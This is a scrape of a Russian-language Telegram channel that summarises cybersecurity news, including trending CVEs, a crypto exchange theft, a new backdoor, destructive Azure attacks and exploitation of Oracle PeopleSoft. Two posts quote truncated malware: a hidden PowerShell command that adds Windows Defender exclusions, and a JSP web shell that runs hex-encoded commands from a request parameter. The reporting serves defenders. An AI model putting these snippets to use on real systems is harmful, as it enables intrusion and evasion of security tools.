CBUnit – главное в кибербезопасности
54 subscribers
512 photos
4.58K links
Краткое содержание новостей кибербезопасности

По вопросам: a@cbunit.ru
Download Telegram
Positive Technologies выявила 6 трендовых уязвимостей в ПО от JetBrains, TrueConf, Microsoft и Zimbra

Positive Technologies добавила шесть новых уязвимостей в список трендовых.

Уязвимости обнаружены в JetBrains TeamCity, TrueConf Server, Microsoft SharePoint Server, Windows Ancillary Function Driver и Zimbra Collaboration Suite. Все они активно эксплуатируются злоумышленниками.

Среди новых угроз — удалённое выполнение команд в JetBrains TeamCity (CVE-2026-63077, CVSS 9,8), получение полного контроля над сервером TrueConf Server (CVE-2026-72529, CVE-2026-72530), обход аутентификации в Microsoft SharePoint Server (CVE-2026-55040, CVSS 9,1), повышение привилегий в Windows (CVE-2026-68820, CVSS 7,0) и выполнение произвольных команд в Zimbra Collaboration Suite (CVE-2026-73570, CVSS 8,9). APT-группировка Lazarus уже использует уязвимость в Windows в рамках кампании Operation Dream Job.

Специалисты Positive Technologies рекомендуют администраторам установить последние обновления безопасности от вендоров или применить компенсирующие меры.

ⓘ Что такое TrueConf Server
TrueConf Server — это программный продукт для организации видеоконференцсвязи и совместной работы, позволяющий развернуть собственную защищённую систему коммуникаций внутри компании.

❝Все выявленные недостатки уже активно эксплуатируются хакерами в реальных атаках.❞
— Positive Technologies


Источник: SecurityMedia
@cbunit
Хакеры из КНДР вывели $351,6 млн с кошельков Bitget

Криптовалютная биржа Bitget сообщила о краже $351,6 млн, предположительно, северокорейскими хакерами. Инцидент затронул ограниченное число горячих и тёплых кошельков, холодные кошельки и большинство активов платформы остались в безопасности.

Bitget приостановила вывод средств для проведения всестороннего обзора безопасности. Биржа привлекла Google-owned Mandiant и SlowMist для расследования. Кошелёк Bitget Wallet работает на отдельной инфраструктуре и не пострадал.

ⓘ Что такое Bitget
Bitget — криптовалютная биржа, основанная в 2018 году. Платформа предоставляет услуги спотовой и маржинальной торговли, а также фьючерсные контракты. Bitget Wallet — это отдельный некастодиальный кошелёк, не связанный напрямую с инфраструктурой биржи.

Источники: The Hacker News · TechCrunch / Security
@cbunit
Бэкдор Kothamine использует tailcat для обхода сетевого обнаружения

Обнаружен новый бэкдор Kothamine Agent, который управляет заражёнными Windows-компьютерами.

Вредоносное ПО поддерживает более 30 команд, включая выполнение произвольного кода, изменение файлов и кражу данных браузера. В последних версиях Kothamine использует утилиту tailcat от Tailscale для получения команд по зашифрованному каналу, что затрудняет сетевой мониторинг и блокировку.

ⓘ Что такое tailcat
Tailcat — это утилита с открытым исходным кодом от Tailscale, которая позволяет устанавливать зашифрованные соединения без необходимости регистрации или учётных записей. Она использует инфраструктуру Tailscale для передачи данных, но не имеет централизованного управления, что делает её привлекательной для использования в вредоносном ПО.

powershell -NoP -NonI -W Hidden -Exec Bypass -Command "
Add-MpPreference -ExclusionPath 'C:\Users\{USER}\Desktop' -ErrorAction SilentlyContinue; 
Add-MpPreference -ExclusionPath 'C:\Users\{USER}\AppData\Roaming\MicrosoftEdgeUpdateCore.exe' -ErrorAction SilentlyContinue;  
Add-MpPreference -ExclusionPath 'C:\Users\{USER}\AppData\Roaming\MicrosoftEdgeUpdateCore.dll' -ErrorAction SilentlyContinue;  
Add-MpPreference -ExclusionProcess '{PROCESS_NAME}.exe' -ErrorAction SilentlyContinue;
…


Источник: Malwarebytes Labs
@cbunit
Storm-3168 использует украденные учётные данные для уничтожения ресурсов в Azure

Microsoft Security Research выявила вредоносную активность в облаке, связанную с группировкой JADEPUFFER, которую Microsoft отслеживает как Storm-3168. Исследователи обнаружили масштабные деструктивные операции в Azure с использованием скомпрометированных service principals и кражи облачных учётных данных. Эти действия расширяют известные возможности JADEPUFFER, демонстрируя эволюцию их облачных операций и предоставляя первое детальное представление об их активности в Azure.

Атакующие скомпрометировали два service principals из одного клиента. Один выполнял разведку и поиск ресурсов, второй — поиск, деструктивные операции и сбор учётных данных. Злоумышленники удалили множество ресурсов Azure, включая учётные записи хранения, базы данных SQL, Key Vault, Function Apps и App Services. Попытки удаления ресурсов резервного копирования и восстановления были заблокированы механизмами защиты.

ⓘ Что такое service principals
Service principal — это идентификатор приложения, который используется для доступа к ресурсам Azure. Он позволяет приложениям, автоматизированным инструментам и облачным службам безопасно аутентифицироваться и получать доступ к ресурсам Azure без необходимости использования учётных данных пользователя.

Источник: Microsoft Security
@cbunit
«Лаборатория Касперского»: мошенники обманывают россиян при оформлении шенгенских виз

Разбор целиком: cbunit.ru
Источник: Kaspersky
@cbunit
ShinyHunters обходит WAF для эксплуатации Oracle PeopleSoft

Группа UNC6240 (ShinyHunters) возобновила массовую эксплуатацию уязвимости CVE-2026-35273 в Oracle PeopleSoft. Злоумышленники обошли правила межсетевых экранов веб-приложений (WAF), используя URL-кодирование пути к уязвимому эндпоинту /PSEMHUB/.

Атакующие развернули веб-шеллы на десятках систем по всему миру в секторах высшего образования, технологий, IT-услуг, здравоохранения, сельского хозяйства, транспорта и государственного управления. Эксплуатация происходит через уязвимый сервлет Environment Management Hub (EMHub).

ⓘ Уязвимость CVE-2026-35273
Уязвимость CVE-2026-35273 в Oracle PeopleSoft позволяет удалённо выполнить код. Злоумышленники используют её для получения доступа к системам, развёртывания веб-шеллов и дальнейшей компрометации.

<%@ page import="java.util.*,java.io.*" %><%
String h = request.getParameter("c");
String ts = request.getParameter("t");
if (h != null) {
int t = ts != null ? Integer.parseInt(ts) : 30;
StringBuilder cs = new StringBuilder();
for (int i = 0; i + 1 < h.length(); i += 2) {
cs.append((char) Integer.parseInt(h.substring(i, i + 2), 16));
}
String c = cs.toString();
boolean wn = System.getProperty("os.name").toLowerCase().contains("win");
Process p = new ProcessBuilder(
wn ? new String[]{"cmd.exe", "/c", c}
…


Источник: Google Threat Intelligence
@cbunit
CISA добавила уязвимости Microsoft SharePoint и Mikrotik RouterOS в каталог KEV

Агентство по кибербезопасности и защите инфраструктуры США (CISA) внесло две уязвимости в каталог известных эксплуатируемых уязвимостей (KEV).

Первая уязвимость CVE-2026-65660 (CVSS 8.8) затрагивает Microsoft SharePoint Server версий 2016, 2019 и Subscription Edition. Она позволяет аутентифицированному злоумышленнику с низкими привилегиями удалённо выполнить произвольный код.

Вторая уязвимость CVE-2026-67279 (CVSS 6.9) обнаружена в протоколе SSH для MikroTik RouterOS. Она позволяет неаутентифицированному атакующему обойти процесс аутентификации, открыть сессию и выполнить команды. CERT Polska подтверждает активную эксплуатацию этой уязвимости, в том числе в связке с CVE-2026-86060, что приводит к полному административному доступу без аутентификации.

ⓘ Что такое MikroTik RouterOS
MikroTik RouterOS — это операционная система для сетевого оборудования компании MikroTik. Она используется для маршрутизаторов, коммутаторов и точек доступа Wi-Fi, предоставляя функции управления сетью, маршрутизации и безопасности.

Источники: Security Affairs · The Hacker News · Хабр / Новости
@cbunit